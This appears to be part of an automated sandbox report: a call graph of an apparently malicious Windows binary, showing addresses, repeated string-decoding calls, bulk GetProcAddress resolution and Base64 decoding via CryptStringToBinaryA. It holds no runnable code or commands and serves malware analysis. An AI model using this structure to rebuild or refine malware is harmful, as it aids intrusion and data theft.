17b2b5 lstrcat 7125->8573 7126 1716cb lstrcpy 7133 17cb6f 7126->7133 7127 17cb8e 7131 17cba8 7127->7131 7135 1716cb lstrcpy 7127->7135 7128 17cb74 7128->7127 7129 1716cb lstrcpy 7128->7129 7134 17cb89 7129->7134 7130->7122 7136 17cb5a 7130->7136 7137 17cbc2 7131->7137 7142 1716cb lstrcpy 7131->7142 8584 17b676 7133->8584 8613 17b7ca 7134->8613 7141 17cba3 7135->7141 7136->7126 7136->7128 7139 17cbdc 7137->7139 7143 1716cb lstrcpy 7137->7143 7144 17e9c2 lstrcpy 7139->7144 8626 17ba63 7141->8626 7146 17cbbd 7142->7146 7147 17cbd7 7143->7147 7148 17cbf2 7144->7148 8686 17c699 7146->8686 8695 17da1e 7147->8695 7151 1716cb lstrcpy 7148->7151 7161 173093 7159->7161 7160 1730a6 malloc 7166 17186d 7160->7166 7161->7160 7165 171923 7165->6879 7167 171881 malloc 7166->7167 7168 172f36 7167->7168 7169 172f53 7168->7169 7170 172fbc malloc 7169->7170 7171 172fdb 7170->7171 7171->7165 7172->7004 7174 17e990 lstrcpy 7173->7174 7175 17ce0f 7174->7175 7176 17eaab 3 API calls 7175->7176 7177 17ce1f 7176->7177 7178 17ea2f lstrcpy 7177->7178 7179 17ce26 7178->7179 7180 17eaab 3 API calls 7179->7180 7181 17ce3e 7180->7181 7182 17ea2f lstrcpy 7181->7182 7183 17ce45 7182->7183 7184 17eaab 3 API calls 7183->7184 7185 17ce5d 7184->7185 7186 17ea2f lstrcpy 7185->7186 7187 17ce64 7186->7187 7188 17eaab 3 API calls 7187->7188 7189 17ce77 7188->7189 7190 17ea2f lstrcpy 7189->7190 7191 17ce7e 7190->7191 7192 17eaab 3 API calls 7191->7192 7193 17ce96 7192->7193 7194 17ea2f lstrcpy 7193->7194 7195 17ce9d 7194->7195 7196 17eaab 3 API calls 7195->7196 7197 17ceb5 7196->7197 7198 17ea2f lstrcpy 7197->7198 7199 17cebc 7198->7199 7199->7019 7201 17183d 7200->7201 7201->7021 7203 17ea00 7202->7203 7204 17c78d 7203->7204 7205 17ea1f lstrcpy 7203->7205 7204->7031 7205->7204 7207 173083 3 API calls 7206->7207 7208 171bed 7207->7208 7209 173083 3 API calls 7208->7209 7210 171bfe 7209->7210 7211 173083 3 API calls 7210->7211 7212 171c0f 7211->7212 7213 173083 3 API calls 7212->7213 7214 171c20 7213->7214 7215 173083 3 API calls 7214->7215 7216 171c31 7215->7216 7217 173083 3 API calls 7216->7217 7218 171c42 7217->7218 7219 173083 3 API calls 7218->7219 7220 171c53 7219->7220 7221 173083 3 API calls 7220->7221 7222 171c64 7221->7222 7223 173083 3 API calls 7222->7223 7224 171c75 7223->7224 7225 173083 3 API calls 7224->7225 7226 171c86 7225->7226 7227 173083 3 API calls 7226->7227 7228 171c97 7227->7228 7229 173083 3 API calls 7228->7229 7230 171ca8 7229->7230 7231 173083 3 API calls 7230->7231 7232 171cb9 7231->7232 7233 173083 3 API calls 7232->7233 7234 171cca 7233->7234 7235 173083 3 API calls 7234->7235 7236 171cdb 7235->7236 7237 173083 3 API calls 7236->7237 7238 171cec 7237->7238 7239 173083 3 API calls 7238->7239 7240 171cfd 7239->7240 7241 173083 3 API calls 7240->7241 7242 171d0e 7241->7242 7243 173083 3 API calls 7242->7243 7244 171d1f 7243->7244 7245 173083 3 API calls 7244->7245 7246 171d30 7245->7246 7247 173083 3 API calls 7246->7247 7248 171d41 7247->7248 7249 173083 3 API calls 7248->7249 7250 171d52 7249->7250 7251 173083 3 API calls 7250->7251 7252 171d63 7251->7252 7253 173083 3 API calls 7252->7253 7254 171d74 7253->7254 7255 173083 3 API calls 7254->7255 7256 171d85 7255->7256 7257 173083 3 API calls 7256->7257 7258 171d96 7257->7258 7259 173083 3 API calls 7258->7259 7260 171da7 7259->7260 7261 173083 3 API calls 7260->7261 7262 171db8 7261->7262 7263 173083 3 API calls 7262->7263 7264 171dc9 7263->7264 7265 173083 3 API calls 7264->7265 7266 171dda 7265->7266 7267 173083 3 API calls 7266->7267 7268 171deb 7267->7268 7269 173083 3 API calls 7268->7269 7270 171dfc 7269->7270 7271 173083 3 API calls 7270->7271 7272 171e0d 7271->7272 7273 173083 3 API calls 7272->7273 7274 171e1e 7273->7274 7275 173083 3 API calls 7274->7275 7276 171e2f 7275->7276 7277 173083 3 API calls 7276->7277 7278 171e40 7277->7278 7279 173083 3 API calls 7278->7279 7280 171e51 7279->7280 7281 173083 3 API calls 7280->7281 7282 171e62 7281->7282 7283 173083 3 API calls 7282->7283 7284 171e73 7283->7284 7285 173083 3 API calls 7284->7285 7286 171e84 7285->7286 7287 173083 3 API calls 7286->7287 7288 171e95 7287->7288 7289 173083 3 API calls 7288->7289 7290 171ea6 7289->7290 7291 173083 3 API calls 7290->7291 7292 171eb7 7291->7292 7293 173083 3 API calls 7292->7293 7294 171ec8 7293->7294 7295 173083 3 API calls 7294->7295 7296 171ed9 7295->7296 7297 173083 3 API calls 7296->7297 7298 171eea 7297->7298 7299 173083 3 API calls 7298->7299 7300 171efb 7299->7300 7301 173083 3 API calls 7300->7301 7302 171f0c 7301->7302 7303 173083 3 API calls 7302->7303 7304 171f1d 7303->7304 7305 173083 3 API calls 7304->7305 7306 171f2e 7305->7306 7307 173083 3 API calls 7306->7307 7308 171f3f 7307->7308 7309 173083 3 API calls 7308->7309 7310 171f50 7309->7310 7311 173083 3 API calls 7310->7311 7312 171f61 7311->7312 7313 173083 3 API calls 7312->7313 7314 171f72 7313->7314 7315 173083 3 API calls 7314->7315 7316 171f83 7315->7316 7317 173083 3 API calls 7316->7317 7318 171f94 7317->7318 7319 173083 3 API calls 7318->7319 7320 171fa5 7319->7320 7321 173083 3 API calls 7320->7321 7322 171fb6 7321->7322 7323 173083 3 API calls 7322->7323 7324 171fc7 7323->7324 7325 173083 3 API calls 7324->7325 7326 171fd8 7325->7326 7327 173083 3 API calls 7326->7327 7328 171fe9 7327->7328 7329 173083 3 API calls 7328->7329 7330 171ffa 7329->7330 7331 173083 3 API calls 7330->7331 7332 17200b 7331->7332 7333 173083 3 API calls 7332->7333 7334 17201c 7333->7334 7335 173083 3 API calls 7334->7335 7336 17202d 7335->7336 7337 173083 3 API calls 7336->7337 7338 17203e 7337->7338 7339 173083 3 API calls 7338->7339 7340 17204f 7339->7340 7341 173083 3 API calls 7340->7341 7342 172060 7341->7342 7343 173083 3 API calls 7342->7343 7344 172071 7343->7344 7345 173083 3 API calls 7344->7345 7346 172082 7345->7346 7347 173083 3 API calls 7346->7347 7348 172093 7347->7348 7349 173083 3 API calls 7348->7349 7350 1720a4 7349->7350 7351 173083 3 API calls 7350->7351 7352 1720b5 7351->7352 7353 173083 3 API calls 7352->7353 7354 1720c6 7353->7354 7355 173083 3 API calls 7354->7355 7356 1720d7 7355->7356 7357 173083 3 API calls 7356->7357 7358 1720e8 7357->7358 7359 173083 3 API calls 7358->7359 7360 1720f9 7359->7360 7361 173083 3 API calls 7360->7361 7362 17210a 7361->7362 7363 173083 3 API calls 7362->7363 7364 17211b 7363->7364 7365 173083 3 API calls 7364->7365 7366 17212c 7365->7366 7367 173083 3 API calls 7366->7367 7368 17213d 7367->7368 7369 173083 3 API calls 7368->7369 7370 17214e 7369->7370 7371 173083 3 API calls 7370->7371 7372 17215f 7371->7372 7373 173083 3 API calls 7372->7373 7374 172170 7373->7374 7375 173083 3 API calls 7374->7375 7376 172181 7375->7376 7377 173083 3 API calls 7376->7377 7378 172192 7377->7378 7379 173083 3 API calls 7378->7379 7380 1721a3 7379->7380 7381 173083 3 API calls 7380->7381 7382 1721b4 7381->7382 7383 173083 3 API calls 7382->7383 7384 1721c5 7383->7384 7385 173083 3 API calls 7384->7385 7386 1721d6 7385->7386 7387 173083 3 API calls 7386->7387 7388 1721e7 7387->7388 7389 173083 3 API calls 7388->7389 7390 1721f8 7389->7390 7391 173083 3 API calls 7390->7391 7392 172209 7391->7392 7393 173083 3 API calls 7392->7393 7394 17221a 7393->7394 7395 173083 3 API calls 7394->7395 7396 17222b 7395->7396 7397 173083 3 API calls 7396->7397 7398 17223c 7397->7398 7399 173083 3 API calls 7398->7399 7400 17224d 7399->7400 7401 173083 3 API calls 7400->7401 7402 17225e 7401->7402 7403 173083 3 API calls 7402->7403 7404 17226f 7403->7404 7405 173083 3 API calls 7404->7405 7406 172280 7405->7406 7407 173083 3 API calls 7406->7407 7408 172291 7407->7408 7409 173083 3 API calls 7408->7409 7410 1722a2 7409->7410 7411 173083 3 API calls 7410->7411 7412 1722b3 7411->7412 7413 173083 3 API calls 7412->7413 7414 1722c4 7413->7414 7415 173083 3 API calls 7414->7415 7416 1722d5 7415->7416 7417 173083 3 API calls 7416->7417 7418 1722e6 7417->7418 7419 173083 3 API calls 7418->7419 7420 1722f7 7419->7420 7421 173083 3 API calls 7420->7421 7422 172308 7421->7422 7423 173083 3 API calls 7422->7423 7424 172319 7423->7424 7425 173083 3 API calls 7424->7425 7426 17232a 7425->7426 7427 173083 3 API calls 7426->7427 7428 17233b 7427->7428 7429 173083 3 API calls 7428->7429 7430 17234c 7429->7430 7431 173083 3 API calls 7430->7431 7432 17235d 7431->7432 7433 173083 3 API calls 7432->7433 7434 17236e 7433->7434 7435 173083 3 API calls 7434->7435 7436 17237f 7435->7436 7437 173083 3 API calls 7436->7437 7438 172390 7437->7438 7439 173083 3 API calls 7438->7439 7440 1723a1 7439->7440 7441 173083 3 API calls 7440->7441 7442 1723b2 7441->7442 7443 173083 3 API calls 7442->7443 7444 1723c3 7443->7444 7445 173083 3 API calls 7444->7445 7446 1723d4 7445->7446 7447 173083 3 API calls 7446->7447 7448 1723e5 7447->7448 7449 173083 3 API calls 7448->7449 7450 1723f6 7449->7450 7451 173083 3 API calls 7450->7451 7452 172407 7451->7452 7453 173083 3 API calls 7452->7453 7454 172418 7453->7454 7455 173083 3 API calls 7454->7455 7456 172429 7455->7456 7457 173083 3 API calls 7456->7457 7458 17243a 7457->7458 7459 173083 3 API calls 7458->7459 7460 17244b 7459->7460 7461 173083 3 API calls 7460->7461 7462 17245c 7461->7462 7463 173083 3 API calls 7462->7463 7464 17246d 7463->7464 7465 173083 3 API calls 7464->7465 7466 17247e 7465->7466 7467 173083 3 API calls 7466->7467 7468 17248f 7467->7468 7469 173083 3 API calls 7468->7469 7470 1724a0 7469->7470 7471 173083 3 API calls 7470->7471 7472 1724b1 7471->7472 7473 173083 3 API calls 7472->7473 7474 1724c2 7473->7474 7475 173083 3 API calls 7474->7475 7476 1724d3 7475->7476 7477 173083 3 API calls 7476->7477 7478 1724e4 7477->7478 7479 173083 3 API calls 7478->7479 7480 1724f5 7479->7480 7481 173083 3 API calls 7480->7481 7482 172506 7481->7482 7483 173083 3 API calls 7482->7483 7484 172517 7483->7484 7485 173083 3 API calls 7484->7485 7486 172528 7485->7486 7487 173083 3 API calls 7486->7487 7488 172539 7487->7488 7489 173083 3 API calls 7488->7489 7490 17254a 7489->7490 7491 173083 3 API calls 7490->7491 7492 17255b 7491->7492 7493 173083 3 API calls 7492->7493 7494 17256c 7493->7494 7495 173083 3 API calls 7494->7495 7496 17257d 7495->7496 7497 173083 3 API calls 7496->7497 7498 17258e 7497->7498 7499 173083 3 API calls 7498->7499 7500 17259f 7499->7500 7501 173083 3 API calls 7500->7501 7502 1725b0 7501->7502 7503 173083 3 API calls 7502->7503 7504 1725c1 7503->7504 7505 173083 3 API calls 7504->7505 7506 1725d2 7505->7506 7507 173083 3 API calls 7506->7507 7508 1725e3 7507->7508 7509 173083 3 API calls 7508->7509 7510 1725f4 7509->7510 7511 173083 3 API calls 7510->7511 7512 172605 7511->7512 7513 173083 3 API calls 7512->7513 7514 172616 7513->7514 7515 173083 3 API calls 7514->7515 7516 172627 7515->7516 7517 173083 3 API calls 7516->7517 7518 172638 7517->7518 7519 173083 3 API calls 7518->7519 7520 172649 7519->7520 7521 173083 3 API calls 7520->7521 7522 17265a 7521->7522 7523 173083 3 API calls 7522->7523 7524 17266b 7523->7524 7525 173083 3 API calls 7524->7525 7526 17267c 7525->7526 7527 173083 3 API calls 7526->7527 7528 17268d 7527->7528 7529 173083 3 API calls 7528->7529 7530 17269e 7529->7530 7531 173083 3 API calls 7530->7531 7532 1726af 7531->7532 7533 173083 3 API calls 7532->7533 7534 1726c0 7533->7534 7535 173083 3 API calls 7534->7535 7536 1726d1 7535->7536 7537 173083 3 API calls 7536->7537 7538 1726e2 7537->7538 7539 173083 3 API calls 7538->7539 7540 1726f3 7539->7540 7541 173083 3 API calls 7540->7541 7542 172704 7541->7542 7543 173083 3 API calls 7542->7543 7544 172715 7543->7544 7545 173083 3 API calls 7544->7545 7546 172726 7545->7546 7547 173083 3 API calls 7546->7547 7548 172737 7547->7548 7549 173083 3 API calls 7548->7549 7550 172748 7549->7550 7551 173083 3 API calls 7550->7551 7552 172759 7551->7552 7553 173083 3 API calls 7552->7553 7554 17276a 7553->7554 7555 173083 3 API calls 7554->7555 7556 17277b 7555->7556 7557 173083 3 API calls 7556->7557 7558 17278c 7557->7558 7559 173083 3 API calls 7558->7559 7560 17279d 7559->7560 7561 173083 3 API calls 7560->7561 7562 1727ae 7561->7562 7563 173083 3 API calls 7562->7563 7564 1727bf 7563->7564 7565 173083 3 API calls 7564->7565 7566 1727d0 7565->7566 7567 173083 3 API calls 7566->7567 7568 1727e1 7567->7568 7569 173083 3 API calls 7568->7569 7570 1727f2 7569->7570 7571 173083 3 API calls 7570->7571 7572 172803 7571->7572 7573 173083 3 API calls 7572->7573 7574 172814 7573->7574 7575 173083 3 API calls 7574->7575 7576 172825 7575->7576 7577 173083 3 API calls 7576->7577 7578 172836 7577->7578 7579 173083 3 API calls 7578->7579 7580 172847 7579->7580 7581 173083 3 API calls 7580->7581 7582 172858 7581->7582 7583 173083 3 API calls 7582->7583 7584 172869 7583->7584 7585 173083 3 API calls 7584->7585 7586 17287a 7585->7586 7587 173083 3 API calls 7586->7587 7588 17288b 7587->7588 7589 173083 3 API calls 7588->7589 7590 17289c 7589->7590 7591 173083 3 API calls 7590->7591 7592 1728ad 7591->7592 7593 173083 3 API calls 7592->7593 7594 1728be 7593->7594 7595 173083 3 API calls 7594->7595 7596 1728cf 7595->7596 7597 173083 3 API calls 7596->7597 7598 1728e0 7597->7598 7599 173083 3 API calls 7598->7599 7600 1728f1 7599->7600 7601 173083 3 API calls 7600->7601 7602 172902 7601->7602 7603 173083 3 API calls 7602->7603 7604 172913 7603->7604 7605 173083 3 API calls 7604->7605 7606 172924 7605->7606 7607 173083 3 API calls 7606->7607 7608 172935 7607->7608 7609 173083 3 API calls 7608->7609 7610 172946 7609->7610 7611 173083 3 API calls 7610->7611 7612 172957 7611->7612 7613 173083 3 API calls 7612->7613 7614 172968 7613->7614 7615 173083 3 API calls 7614->7615 7616 172979 7615->7616 7617 173083 3 API calls 7616->7617 7618 17298a 7617->7618 7619 173083 3 API calls 7618->7619 7620 17299b 7619->7620 7621 173083 3 API calls 7620->7621 7622 1729ac 7621->7622 7623 173083 3 API calls 7622->7623 7624 1729bd 7623->7624 7625 173083 3 API calls 7624->7625 7626 1729ce 7625->7626 7627 173083 3 API calls 7626->7627 7628 1729df 7627->7628 7629 173083 3 API calls 7628->7629 7630 1729f0 7629->7630 7631 173083 3 API calls 7630->7631 7632 172a01 7631->7632 7633 173083 3 API calls 7632->7633 7634 172a12 7633->7634 7635 173083 3 API calls 7634->7635 7636 172a23 7635->7636 7637 173083 3 API calls 7636->7637 7638 172a34 7637->7638 7639 173083 3 API calls 7638->7639 7640 172a45 7639->7640 7641 173083 3 API calls 7640->7641 7642 172a56 7641->7642 7643 173083 3 API calls 7642->7643 7644 172a67 7643->7644 7645 173083 3 API calls 7644->7645 7646 172a78 7645->7646 7647 173083 3 API calls 7646->7647 7648 172a89 7647->7648 7649 173083 3 API calls 7648->7649 7650 172a9a 7649->7650 7651 173083 3 API calls 7650->7651 7652 172aab 7651->7652 7653 173083 3 API calls 7652->7653 7654 172abc 7653->7654 7655 173083 3 API calls 7654->7655 7656 172acd 7655->7656 7657 173083 3 API calls 7656->7657 7658 172ade 7657->7658 7659 173083 3 API calls 7658->7659 7660 172aef 7659->7660 7661 173083 3 API calls 7660->7661 7662 172b00 7661->7662 7663 173083 3 API calls 7662->7663 7664 172b11 7663->7664 7665 173083 3 API calls 7664->7665 7666 172b22 7665->7666 7667 173083 3 API calls 7666->7667 7668 172b33 7667->7668 7669 173083 3 API calls 7668->7669 7670 172b44 7669->7670 7671 173083 3 API calls 7670->7671 7672 172b55 7671->7672 7673 173083 3 API calls 7672->7673 7674 172b66 7673->7674 7675 173083 3 API calls 7674->7675 7676 172b77 7675->7676 7677 173083 3 API calls 7676->7677 7678 172b88 7677->7678 7679 173083 3 API calls 7678->7679 7680 172b99 7679->7680 7681 173083 3 API calls 7680->7681 7682 172baa 7681->7682 7683 173083 3 API calls 7682->7683 7684 172bbb 7683->7684 7685 173083 3 API calls 7684->7685 7686 172bcc 7685->7686 7687 173083 3 API calls 7686->7687 7688 172bdd 7687->7688 7689 173083 3 API calls 7688->7689 7690 172bee 7689->7690 7691 173083 3 API calls 7690->7691 7692 172bff 7691->7692 7693 173083 3 API calls 7692->7693 7694 172c10 7693->7694 7695 173083 3 API calls 7694->7695 7696 172c21 7695->7696 7697 173083 3 API calls 7696->7697 7698 172c32 7697->7698 7699 173083 3 API calls 7698->7699 7700 172c43 7699->7700 7701 173083 3 API calls 7700->7701 7702 172c54 7701->7702 7703 173083 3 API calls 7702->7703 7704 172c65 7703->7704 7705 173083 3 API calls 7704->7705 7706 172c76 7705->7706 7707 173083 3 API calls 7706->7707 7708 172c87 7707->7708 7709 173083 3 API calls 7708->7709 7710 172c98 7709->7710 7711 173083 3 API calls 7710->7711 7712 172ca9 7711->7712 7713 173083 3 API calls 7712->7713 7714 172cba 7713->7714 7715 173083 3 API calls 7714->7715 7716 172ccb 7715->7716 7717 173083 3 API calls 7716->7717 7718 172cdc 7717->7718 7719 173083 3 API calls 7718->7719 7720 172ced 7719->7720 7721 173083 3 API calls 7720->7721 7722 172cfe 7721->7722 7723 173083 3 API calls 7722->7723 7724 172d0f 7723->7724 7725 173083 3 API calls 7724->7725 7726 172d20 7725->7726 7727 173083 3 API calls 7726->7727 7728 172d31 7727->7728 7729 173083 3 API calls 7728->7729 7730 172d42 7729->7730 7731 173083 3 API calls 7730->7731 7732 172d53 7731->7732 7733 173083 3 API calls 7732->7733 7734 172d64 7733->7734 7735 173083 3 API calls 7734->7735 7736 172d75 7735->7736 7737 173083 3 API calls 7736->7737 7738 172d86 7737->7738 7739 173083 3 API calls 7738->7739 7740 172d97 7739->7740 7741 173083 3 API calls 7740->7741 7742 172da8 7741->7742 7743 173083 3 API calls 7742->7743 7744 172db9 7743->7744 7745 173083 3 API calls 7744->7745 7746 172dca 7745->7746 7747 173083 3 API calls 7746->7747 7748 172ddb 7747->7748 7749 173083 3 API calls 7748->7749 7750 172dec 7749->7750 7751 173083 3 API calls 7750->7751 7752 172dfd 7751->7752 7753 173083 3 API calls 7752->7753 7754 172e0e 7753->7754 7755 173083 3 API calls 7754->7755 7756 172e1f 7755->7756 7757 173083 3 API calls 7756->7757 7758 172e30 7757->7758 7759 173083 3 API calls 7758->7759 7760 172e41 7759->7760 7761 173083 3 API calls 7760->7761 7762 172e52 7761->7762 7763 173083 3 API calls 7762->7763 7764 172e63 7763->7764 7765 173083 3 API calls 7764->7765 7766 172e74 7765->7766 7767 173083 3 API calls 7766->7767 7768 172e85 7767->7768 7769 173083 3 API calls 7768->7769 7770 172e96 7769->7770 7771 173083 3 API calls 7770->7771 7772 172ea7 7771->7772 7773 173083 3 API calls 7772->7773 7774 172eb8 7773->7774 7775 173083 3 API calls 7774->7775 7776 172ec9 7775->7776 7777 173083 3 API calls 7776->7777 7778 172eda 7777->7778 7779 173083 3 API calls 7778->7779 7780 172eeb 7779->7780 7781 173083 3 API calls 7780->7781 7782 172efc 7781->7782 7783 173083 3 API calls 7782->7783 7784 172f0d 7783->7784 7785 173083 3 API calls 7784->7785 7786 172f1e 7785->7786 7787 173083 3 API calls 7786->7787 7788 172f2f 7787->7788 7789 17e08e 7788->7789 7790 17e42e 6 API calls 7789->7790 7791 17e09b 40 API calls 7789->7791 7792 17e49d GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7790->7792 7793 17e50b 7790->7793 7791->7790 7792->7793 7794 17e5cb 7793->7794 7795 17e518 8 API calls 7793->7795 7796 17e5d4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7794->7796 7797 17e642 7794->7797 7795->7794 7796->7797 7798 17e6d4 7797->7798 7799 17e64f 6 API calls 7797->7799 7800 17e794 7798->7800 7801 17e6e1 8 API calls 7798->7801 7799->7798 7802 17e79d GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7800->7802 7803 17e80b 7800->7803 7801->7800 7802->7803 7804 17e814 GetProcAddress GetProcAddress 7803->7804 7805 17e83d 7803->7805 7804->7805 7806 17e846 GetProcAddress GetProcAddress 7805->7806 7807 17e86f 7805->7807 7806->7807 7808 17e92f 7807->7808 7809 17e87c 8 API calls 7807->7809 7810 17c886 7808->7810 7811 17e938 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7808->7811 7809->7808 7810->7041 7811->7810 7813 17d0e4 7812->7813 7813->7813 7814 17d150 GetProcessHeap RtlAllocateHeap 7813->7814 7815 17d168 7814->7815 7816 17e990 lstrcpy 7815->7816 7817 17c92c 7816->7817 7818 17e9c2 7817->7818 7819 17e9d2 7818->7819 7820 17c938 7819->7820 7821 17e9df lstrcpy 7819->7821 7822 173170 7820->7822 7821->7820 7823 17e9c2 lstrcpy 7822->7823 7824 173189 7823->7824 8726 1730f8 7824->8726 7826 173195 7827 17e990 lstrcpy 7826->7827 7828 1731b3 7827->7828 7829 17e990 lstrcpy 7828->7829 7830 1731bc 7829->7830 7831 17e990 lstrcpy 7830->7831 7832 1731c5 7831->7832 7833 17e990 lstrcpy 7832->7833 7834 1731ce 7833->7834 7835 17e990 lstrcpy 7834->7835 7836 1731d7 7835->7836 7837 1735f7 7836->7837 8730 17d78f 7836->8730 8740 174c21 CryptStringToBinaryA 7837->8740 7839 173219 8736 17ea69 7839->8736 7844 17ea2f lstrcpy 7848 17322f 7844->7848 7845 17e9eb 2 API calls 7846 17363a 7845->7846 7847 17eaab 3 API calls 7846->7847 7849 173648 7847->7849 7851 17eaab 3 API calls 7848->7851 7850 17ea2f lstrcpy 7849->7850 7855 173650 7850->7855 7852 17324f 7851->7852 7853 17ea2f lstrcpy 7852->7853 7854 173257 7853->7854 7856 17eaab 3 API calls 7854->7856 7855->7064 7857 17326f 7856->7857 7858 17ea2f lstrcpy 7857->7858 7859 173277 7858->7859 7860 17ea69 2 API calls 7859->7860 7861 17328d 7860->7861 7862 17ea2f lstrcpy 7861->7862 7863 173295 7862->7863 7864 17eaab 3 API calls 7863->7864 7865 1732ad 7864->7865 7866 17ea2f lstrcpy 7865->7866 7867 1732b5 7866->7867 7868 17eaab 3 API calls 7867->7868 7869 1732cd 7868->7869 7870 17ea2f lstrcpy 7869->7870 7871 1732d5 7870->7871 7872 17eaab 3 API calls 7871->7872 7873 1732ee 7872->7873 7874 17ea69 2 API calls 7873->7874 7875 1732f6 7874->7875 7876 17ea2f lstrcpy 7875->7876 7877 1732fe 7876->7877 7877->7837 7878 17eaab 3 API calls 7877->7878 7879 173381 7878->7879 7880 17ea2f lstrcpy 7879->7880 7881 173389 7880->7881 7882 17ea69 2 API calls 7881->7882 7883 17339c 7882->7883 7884 17ea2f lstrcpy 7883->7884 7885 1733a4 7884->7885 7886 17eaab 3 API calls 7885->7886 7887 1733bc 7886->7887 7888 17ea2f lstrcpy 7887->7888 7889 1733c4 7888->7889 7890 17eaab 3 API calls 7889->7890 7891 1733dd 7890->7891 7892 17ea2f lstrcpy 7891->7892 7893 1733e5 7892->7893 7894 17eaab 3 API calls 7893->7894 7895 1733fe 7894->7895 7896 17ea2f lstrcpy 7895->7896 7897 173406 7896->7897 7898 17eaab 3 API calls 7897->7898 7899 17341e 7898->7899 7900 17ea2f lstrcpy 7899->7900 7901 173426 7900->7901 7902 17ea69 2 API calls 7901->7902 7903 17343c 7902->7903 7904 17ea2f lstrcpy 7903->7904 7905 173444 7904->7905 7906 17eaab 3 API calls 7905->7906 7907 17345c 7906->7907 7908 17ea2f lstrcpy 7907->7908 7909 173464 7908->7909 7910 17eaab 3 API calls 7909->7910 7911 17347c 7910->7911 7912 17ea2f lstrcpy 7911->7912 7913 173484 7912->7913 7914 17ea69 2 API calls 7913->7914 7915 17349a 7914->7915 7916 17ea2f lstrcpy 7915->7916 7917 1734a2 7916->7917 7918 17eaab 3 API calls 7917->7918 7919 1734ba 7918->7919 7920 17ea2f lstrcpy 7919->7920 7921 1734c2 7920->7921 7922 17eaab 3 API calls 7921->7922 7923 1734db 7922->7923 7924 17ea2f lstrcpy 7923->7924 7925 1734e3 7924->7925 7926 17eaab 3 API calls 7925->7926 7927 1734fc 7926->7927 7928 17ea2f lstrcpy 7927->7928 7929 173504 7928->7929 7930 17eaab 3 API calls 7929->7930 7931 17351c 7930->7931 7932 17ea2f lstrcpy 7931->7932 7933 173524 7932->7933 7934 17ea69 2 API calls 7933->7934 7935 17353a 7934->7935 7936 17ea2f lstrcpy 7935->7936 7937 173542 7936->7937 7938 17e990 lstrcpy 7937->7938 7939 173553 7938->7939 7940 17ea69 2 API calls 7939->7940 7941 173561 7940->7941 7942 17ea69 2 API calls 7941->7942 7943 17356c 7942->7943 7944 17ea2f lstrcpy 7943->7944 7945 173574 7944->7945 7946 173584 lstrlen lstrlen 7945->7946 7948 1735a8 7946->7948 7947 17eaab 3 API calls 7947->7948 7948->7837 7948->7947 7949 17ea2f lstrcpy 7948->7949 7949->7948 7951 179186 7950->7951 7952 179191 strtok_s 7951->7952 7953 17918a ExitProcess 7951->7953 7954 1792ac 7952->7954 7956 1791ad 7952->7956 7954->7066 7955 17928e strtok_s 7955->7954 7955->7956 7956->7955 7957 17e9eb 2 API calls 7956->7957 7957->7956 7959 17e9c2 lstrcpy 7958->7959 7960 1716d5 7959->7960 7961 17e9c2 lstrcpy 7960->7961 7962 1716e0 7961->7962 7963 17e9c2 lstrcpy 7962->7963 7964 1716eb 7963->7964 7965 17e9c2 lstrcpy 7964->7965 7966 1716f6 7965->7966 7967 173d9b 7966->7967 7968 17e9c2 lstrcpy 7967->7968 7969 173db4 7968->7969 7970 1730f8 4 API calls 7969->7970 7971 173dc0 7970->7971 7972 17e990 lstrcpy 7971->7972 7973 173dde 7972->7973 7974 17e990 lstrcpy 7973->7974 7975 173de7 7974->7975 7976 17e990 lstrcpy 7975->7976 7977 173df0 7976->7977 7978 17e990 lstrcpy 7977->7978 7979 173df9 7978->7979 7980 17e990 lstrcpy 7979->7980 7981 173e02 7980->7981 7982 17d78f 2 API calls 7981->7982 7984 17422a 7981->7984 7983 173e44 7982->7983 7985 17ea69 2 API calls 7983->7985 7986 174c21 2 API calls 7984->7986 7987 173e52 7985->7987 7988 174253 7986->7988 7989 17ea2f lstrcpy 7987->7989 7990 17e9eb 2 API calls 7988->7990 8000 17427b 7988->8000 7993 173e5a 7989->7993 7991 174265 7990->7991 7992 17eaab 3 API calls 7991->7992 7994 174273 7992->7994 7996 17eaab 3 API calls 7993->7996 7995 17ea2f lstrcpy 7994->7995 7995->8000 7997 173e7b 7996->7997 7998 17ea2f lstrcpy 7997->7998 7999 173e83 7998->7999 8001 17eaab 3 API calls 7999->8001 8000->7072 8002 173e9b 8001->8002 8003 17ea2f lstrcpy 8002->8003 8004 173ea3 8003->8004 8005 17ea69 2 API calls 8004->8005 8006 173eb9 8005->8006 8007 17ea2f lstrcpy 8006->8007 8008 173ec1 8007->8008 8009 17eaab 3 API calls 8008->8009 8010 173ed9 8009->8010 8011 17ea2f lstrcpy 8010->8011 8012 173ee1 8011->8012 8013 17eaab 3 API calls 8012->8013 8014 173ef5 8013->8014 8015 17ea2f lstrcpy 8014->8015 8016 173efd 8015->8016 8017 17eaab 3 API calls 8016->8017 8018 173f16 8017->8018 8019 17ea69 2 API calls 8018->8019 8020 173f1e 8019->8020 8021 17ea2f lstrcpy 8020->8021 8022 173f26 8021->8022 8022->7984 8023 17eaab 3 API calls 8022->8023 8024 173fa6 8023->8024 8025 17ea2f lstrcpy 8024->8025 8026 173fae 8025->8026 8027 17ea69 2 API calls 8026->8027 8028 173fc1 8027->8028 8029 17ea2f lstrcpy 8028->8029 8030 173fc9 8029->8030 8031 17eaab 3 API calls 8030->8031 8032 173fdd 8031->8032 8033 17ea2f lstrcpy 8032->8033 8034 173fe5 8033->8034 8035 17eaab 3 API calls 8034->8035 8036 173ffe 8035->8036 8037 17ea2f lstrcpy 8036->8037 8038 174006 8037->8038 8039 17eaab 3 API calls 8038->8039 8040 17401f 8039->8040 8041 17ea2f lstrcpy 8040->8041 8042 174027 8041->8042 8043 17eaab 3 API calls 8042->8043 8044 17403f 8043->8044 8045 17ea2f lstrcpy 8044->8045 8046 174047 8045->8046 8047 17ea69 2 API calls 8046->8047 8048 17405d 8047->8048 8049 17ea2f lstrcpy 8048->8049 8050 174065 8049->8050 8051 17eaab 3 API calls 8050->8051 8052 174079 8051->8052 8053 17ea2f lstrcpy 8052->8053 8054 174081 8053->8054 8055 17eaab 3 API calls 8054->8055 8056 174099 8055->8056 8057 17ea2f lstrcpy 8056->8057 8058 1740a1 8057->8058 8059 17ea69 2 API calls 8058->8059 8060 1740b7 8059->8060 8061 17ea2f lstrcpy 8060->8061 8062 1740bf 8061->8062 8063 17eaab 3 API calls 8062->8063 8064 1740d3 8063->8064 8065 17ea2f lstrcpy 